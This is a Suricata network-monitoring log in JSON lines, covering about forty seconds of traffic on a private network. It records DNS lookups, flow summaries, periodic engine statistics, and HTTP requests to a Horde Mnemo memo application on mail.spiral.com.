{"timestamp":"2020-02-29T00:05:43.000219+0000","event_type":"stats","stats":{"uptime":13995,"capture":{"kernel_packets":133501,"kernel_drops":0},"decoder":{"pkts":133501,"bytes":92407996,"invalid":181,"ipv4":132056,"ipv6":8,"ethernet":133501,"raw":0,"null":0,"sll":0,"tcp":126963,"udp":4898,"sctp":0,"icmpv4":14,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":692,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7098208},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2703,"ssn_memcap_drop":0,"pseudo":340,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2719,"synack":2710,"rst":1194,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":139,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1746,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":102,"dcerpc_udp":0,"dns_udp":2233,"failed_udp":110},"tx":{"http":4529,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2310}},"flow_mgr":{"closed_pruned":2684,"new_pruned":15,"est_pruned":2272,"bypassed_pruned":0,"flows_checked":1,"flows_notimeout":1,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65535,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":23482,"memcap_state":0,"memcap_global":0},"http":{"memuse":79941,"memcap":0}}} {"timestamp":"2020-02-29T00:05:43.001130+0000","flow_id":370778783283435,"event_type":"flow","src_ip":"192.168.10.122","src_port":53380,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:00:42.391403+0000","end":"2020-02-29T00:00:42.497019+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:05:45.000426+0000","flow_id":2022601730571069,"event_type":"flow","src_ip":"192.168.10.122","src_port":59941,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:00:44.604989+0000","end":"2020-02-29T00:00:44.710471+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:05:46.007700+0000","flow_id":1186461792399658,"event_type":"flow","src_ip":"192.168.10.122","src_port":44196,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:00:44.913706+0000","end":"2020-02-29T00:00:45.019117+0000","age":1,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:05:47.000249+0000","flow_id":2122532734704388,"event_type":"flow","src_ip":"192.168.10.122","src_port":56423,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:00:45.989956+0000","end":"2020-02-29T00:00:46.095007+0000","age":1,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:05:47.001105+0000","flow_id":1206437685387358,"event_type":"flow","src_ip":"192.168.10.122","src_port":59463,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:00:46.155742+0000","end":"2020-02-29T00:00:46.261061+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:05:47.656994+0000","flow_id":1275784246733683,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52688,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/mnemo\/js\/memo.js?v=bef6a81df654c73d2a7fc487bc2a4694","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/mnemo\/memo.php?actionID=add_memo","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":581},"app_proto":"http","fileinfo":{"filename":"\/mnemo\/js\/memo.js","state":"CLOSED","stored":false,"size":1565,"tx_id":1}} {"timestamp":"2020-02-29T00:05:50.005989+0000","event_type":"stats","stats":{"uptime":14002,"capture":{"kernel_packets":133527,"kernel_drops":0},"decoder":{"pkts":133528,"bytes":92417809,"invalid":181,"ipv4":132081,"ipv6":8,"ethernet":133528,"raw":0,"null":0,"sll":0,"tcp":126986,"udp":4900,"sctp":0,"icmpv4":14,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":692,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7097344},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2704,"ssn_memcap_drop":0,"pseudo":340,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2720,"synack":2711,"rst":1194,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":139,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1747,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":102,"dcerpc_udp":0,"dns_udp":2234,"failed_udp":110},"tx":{"http":4531,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2311}},"flow_mgr":{"closed_pruned":2685,"new_pruned":15,"est_pruned":2277,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65536,"rows_empty":0,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":21827,"memcap_state":0,"memcap_global":0},"http":{"memuse":45255,"memcap":0}}} {"timestamp":"2020-02-29T00:05:51.000750+0000","flow_id":2068106924568790,"event_type":"flow","src_ip":"192.168.10.130","src_port":34734,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":9,"pkts_toclient":9,"bytes_toserver":1517,"bytes_toclient":6243,"start":"2020-02-29T00:04:40.307414+0000","end":"2020-02-29T00:04:50.024265+0000","age":10,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:05:52.601288+0000","flow_id":2021948915723464,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":38270,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":16280,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:05:52.710276+0000","flow_id":2021948915723464,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":38270,"proto":"UDP","dns":{"type":"answer","id":16280,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:05:52.710276+0000","flow_id":2021948915723464,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":38270,"proto":"UDP","dns":{"type":"answer","id":16280,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:05:52.739096+0000","flow_id":1224077136164186,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52690,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/horde\/imple?token=t178Jy_bOFAgZYI5pak0cNw&app=mnemo&imple=Mnemo_Ajax_Imple_TagAutoCompleter&input=memo_tags","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/mnemo\/memo.php?actionID=add_memo","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":34}} {"timestamp":"2020-02-29T00:05:52.739096+0000","flow_id":1224077136164186,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.81","src_port":52690,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/horde\/imple?token=t178Jy_bOFAgZYI5pak0cNw&app=mnemo&imple=Mnemo_Ajax_Imple_TagAutoCompleter&input=memo_tags","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/mnemo\/memo.php?actionID=add_memo","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":34},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/horde\/imple","state":"CLOSED","stored":false,"size":12,"tx_id":0}} {"timestamp":"2020-02-29T00:05:56.666157+0000","flow_id":1224077136164186,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52690,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/horde\/imple?token=t178Jy_bOFAgZYI5pak0cNw&app=mnemo&imple=Mnemo_Ajax_Imple_TagAutoCompleter&input=memo_tags","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/mnemo\/memo.php?actionID=add_memo","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":34},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/horde\/imple","state":"CLOSED","stored":false,"size":14,"tx_id":0}} {"timestamp":"2020-02-29T00:05:56.679058+0000","flow_id":1544546121178258,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":59017,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":51727,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:05:56.787069+0000","flow_id":1544546121178258,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":59017,"proto":"UDP","dns":{"type":"answer","id":51727,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:05:56.787069+0000","flow_id":1544546121178258,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":59017,"proto":"UDP","dns":{"type":"answer","id":51727,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:05:56.852567+0000","flow_id":1224077136164186,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52690,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/mnemo\/memo.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/mnemo\/memo.php?actionID=add_memo","http_method":"POST","protocol":"HTTP\/1.1","status":302,"redirect":"http:\/\/mail.spiral.com\/mnemo\/list.php","length":20}} {"timestamp":"2020-02-29T00:05:56.852567+0000","flow_id":1224077136164186,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.81","src_port":52690,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/mnemo\/memo.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/mnemo\/memo.php?actionID=add_memo","http_method":"POST","protocol":"HTTP\/1.1","status":302,"redirect":"http:\/\/mail.spiral.com\/mnemo\/list.php","length":20},"app_proto":"http","fileinfo":{"filename":"\/mnemo\/memo.php","state":"CLOSED","stored":false,"size":199,"tx_id":1}} {"timestamp":"2020-02-29T00:05:56.863955+0000","flow_id":787811538317011,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":36067,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":14745,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:05:56.972258+0000","flow_id":787811538317011,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":36067,"proto":"UDP","dns":{"type":"answer","id":14745,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:05:56.972258+0000","flow_id":787811538317011,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":36067,"proto":"UDP","dns":{"type":"answer","id":14745,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:05:57.000120+0000","event_type":"stats","stats":{"uptime":14009,"capture":{"kernel_packets":133531,"kernel_drops":0},"decoder":{"pkts":133537,"bytes":92419642,"invalid":181,"ipv4":132090,"ipv6":8,"ethernet":133537,"raw":0,"null":0,"sll":0,"tcp":126993,"udp":4902,"sctp":0,"icmpv4":14,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":692,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7097632},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2705,"ssn_memcap_drop":0,"pseudo":340,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2721,"synack":2712,"rst":1194,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":139,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1748,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":102,"dcerpc_udp":0,"dns_udp":2235,"failed_udp":110},"tx":{"http":4532,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2312}},"flow_mgr":{"closed_pruned":2686,"new_pruned":15,"est_pruned":2277,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65536,"rows_empty":0,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":22817,"memcap_state":0,"memcap_global":0},"http":{"memuse":51120,"memcap":0}}} {"timestamp":"2020-02-29T00:05:57.055887+0000","flow_id":1224077136164186,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52690,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":2,"http":{"hostname":"mail.spiral.com","url":"\/mnemo\/list.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/mnemo\/memo.php?actionID=add_memo","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":5388}} {"timestamp":"2020-02-29T00:06:02.060739+0000","flow_id":1224077136164186,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52690,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/mnemo\/list.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/mnemo\/memo.php?actionID=add_memo","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":5388},"app_proto":"http","fileinfo":{"filename":"\/mnemo\/list.php","state":"CLOSED","stored":false,"size":26117,"tx_id":2}} {"timestamp":"2020-02-29T00:06:04.000168+0000","event_type":"stats","stats":{"uptime":14016,"capture":{"kernel_packets":133556,"kernel_drops":0},"decoder":{"pkts":133559,"bytes":92428714,"invalid":181,"ipv4":132110,"ipv6":8,"ethernet":133559,"raw":0,"null":0,"sll":0,"tcp":127009,"udp":4906,"sctp":0,"icmpv4":14,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":692,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7098208},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2705,"ssn_memcap_drop":0,"pseudo":340,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2721,"synack":2712,"rst":1194,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":139,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1748,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":102,"dcerpc_udp":0,"dns_udp":2237,"failed_udp":110},"tx":{"http":4534,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2314}},"flow_mgr":{"closed_pruned":2686,"new_pruned":15,"est_pruned":2277,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65536,"rows_empty":0,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":22817,"memcap_state":0,"memcap_global":0},"http":{"memuse":45255,"memcap":0}}} {"timestamp":"2020-02-29T00:06:10.000595+0000","flow_id":1750343770728430,"event_type":"flow","src_ip":"192.168.10.81","src_port":52686,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":5,"pkts_toclient":5,"bytes_toserver":774,"bytes_toclient":1067,"start":"2020-02-29T00:05:04.223214+0000","end":"2020-02-29T00:05:09.228332+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:06:10.001033+0000","flow_id":1969571786109511,"event_type":"flow","src_ip":"192.168.10.81","src_port":52684,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":20,"pkts_toclient":24,"bytes_toserver":4346,"bytes_toclient":20355,"start":"2020-02-29T00:04:59.373319+0000","end":"2020-02-29T00:05:09.312383+0000","age":10,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:06:11.000176+0000","event_type":"stats","stats":{"uptime":14023,"capture":{"kernel_packets":133556,"kernel_drops":0},"decoder":{"pkts":133559,"bytes":92428714,"invalid":181,"ipv4":132110,"ipv6":8,"ethernet":133559,"raw":0,"null":0,"sll":0,"tcp":127009,"udp":4906,"sctp":0,"icmpv4":14,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":692,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7097632},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2705,"ssn_memcap_drop":0,"pseudo":340,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2721,"synack":2712,"rst":1194,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":139,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1748,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":102,"dcerpc_udp":0,"dns_udp":2237,"failed_udp":110},"tx":{"http":4534,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2314}},"flow_mgr":{"closed_pruned":2686,"new_pruned":15,"est_pruned":2277,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65536,"rows_empty":0,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":22817,"memcap_state":0,"memcap_global":0},"http":{"memuse":45095,"memcap":0}}} {"timestamp":"2020-02-29T00:06:13.000304+0000","flow_id":579007405056244,"event_type":"flow","src_ip":"192.168.10.130","src_port":34738,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":10,"pkts_toclient":9,"bytes_toserver":1155,"bytes_toclient":7102,"start":"2020-02-29T00:05:07.352500+0000","end":"2020-02-29T00:05:12.708945+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:06:14.005733+0000","flow_id":1227397127562127,"event_type":"flow","src_ip":"192.168.10.122","src_port":57294,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:01:13.484239+0000","end":"2020-02-29T00:01:13.598172+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:06:17.000973+0000","flow_id":413775703090290,"event_type":"flow","src_ip":"192.168.10.122","src_port":35934,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:01:16.894066+0000","end":"2020-02-29T00:01:16.999282+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:06:18.000275+0000","event_type":"stats","stats":{"uptime":14030,"capture":{"kernel_packets":133556,"kernel_drops":0},"decoder":{"pkts":133559,"bytes":92428714,"invalid":181,"ipv4":132110,"ipv6":8,"ethernet":133559,"raw":0,"null":0,"sll":0,"tcp":127009,"udp":4906,"sctp":0,"icmpv4":14,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":692,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7096768},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2705,"ssn_memcap_drop":0,"pseudo":340,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2721,"synack":2712,"rst":1194,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":139,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1748,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":102,"dcerpc_udp":0,"dns_udp":2237,"failed_udp":110},"tx":{"http":4534,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2314}},"flow_mgr":{"closed_pruned":2689,"new_pruned":15,"est_pruned":2278,"bypassed_pruned":0,"flows_checked":1,"flows_notimeout":1,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65535,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":22157,"memcap_state":0,"memcap_global":0},"http":{"memuse":45015,"memcap":0}}} {"timestamp":"2020-02-29T00:06:18.002196+0000","flow_id":1558539106348560,"event_type":"flow","src_ip":"192.168.10.122","src_port":56244,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:01:17.421392+0000","end":"2020-02-29T00:01:17.526761+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:06:19.000515+0000","flow_id":342874398464368,"event_type":"flow","src_ip":"192.168.10.130","src_port":34740,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":9,"pkts_toclient":7,"bytes_toserver":1079,"bytes_toclient":4180,"start":"2020-02-29T00:05:13.268656+0000","end":"2020-02-29T00:05:18.458861+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:06:21.000394+0000","flow_id":752305025627883,"event_type":"flow","src_ip":"192.168.10.122","src_port":44785,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:01:20.243435+0000","end":"2020-02-29T00:01:20.354683+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:06:21.002044+0000","flow_id":1043121556102940,"event_type":"flow","src_ip":"192.168.10.122","src_port":37302,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:01:19.991004+0000","end":"2020-02-29T00:01:20.096028+0000","age":1,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:06:24.000289+0000","flow_id":992711525217637,"event_type":"flow","src_ip":"192.168.10.122","src_port":57146,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:01:23.144741+0000","end":"2020-02-29T00:01:23.249667+0000","age":0,"state":"established","reason":"timeout","alerted":false}} 